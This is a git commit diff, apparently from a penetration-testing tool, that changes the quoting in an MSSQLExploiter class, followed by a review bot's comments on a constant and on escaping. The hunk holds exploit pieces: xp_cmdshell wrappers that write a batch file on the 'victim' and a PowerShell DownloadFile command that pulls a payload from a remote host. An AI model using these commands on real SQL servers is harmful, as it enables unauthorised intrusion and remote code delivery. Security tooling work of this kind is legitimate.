Agent: Use single quotes to avoid 128 character limit

The logic that splits up commands into 128 character chunks in
MSSQLExploiter is flawed, which results in malformed commands being
written to a batch file on the victim. By using single quotes instead of
double quotes, the 128 character limit is circumvented and there's no
longer any need to break up the commands. See #2018 for more details.

Fixes #2018
This commit is contained in:
Mike Salvatore 2022-06-14 11:18:00 -04:00
parent 6db63d3c69
commit ef63f2699b
1 changed files with 4 additions and 4 deletions


@ -33,16 +33,16 @@ class MSSQLExploiter(HostExploiter):
TMP_FILE_NAME = "tmp_monkey.bat"
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
XP_CMDSHELL_COMMAND_END = '"'
XP_CMDSHELL_COMMAND_START = "xp_cmdshell '"
XP_CMDSHELL_COMMAND_END = "'"
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
MONKEY_DOWNLOAD_COMMAND = (
"powershell (new-object System.Net.WebClient)."
"DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
"DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
)
def __init__(self):
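Review bot: `MAX_XP_CMDSHELL_COMMAND_SIZE = 12800` is a bare magic number: the commit message says breaking up commands is no longer needed, yet the constant that sizes those chunks is raised rather than removed, so if the splitting code in MSSQLExploiter (outside this hunk) still reads it, a comment should explain the choice, e.g. `# Commands are now single-quoted, so the 128-char limit no longer applies; this is only an upper bound on one xp_cmdshell call`, and otherwise the constant and the splitter should both go. With the switch to single-quoted T-SQL literals, every value interpolated between XP_CMDSHELL_COMMAND_START and XP_CMDSHELL_COMMAND_END must have each `'` doubled, as MONKEY_DOWNLOAD_COMMAND now does with `^''`; a `'` in a payload line written through EXPLOIT_COMMAND_PREFIX, or in `http_path`/`dst_path`, would terminate the literal early and break or alter the command sent to the victim. That contract deserves a comment on XP_CMDSHELL_COMMAND_START, `# T-SQL single-quoted literal: any ' in the wrapped command must be escaped as ''`, or better a single escaping helper applied wherever the wrapper is assembled rather than per-constant hand escaping. The class body and `__init__` continue outside the hunk, so I cannot confirm how the constant is consumed.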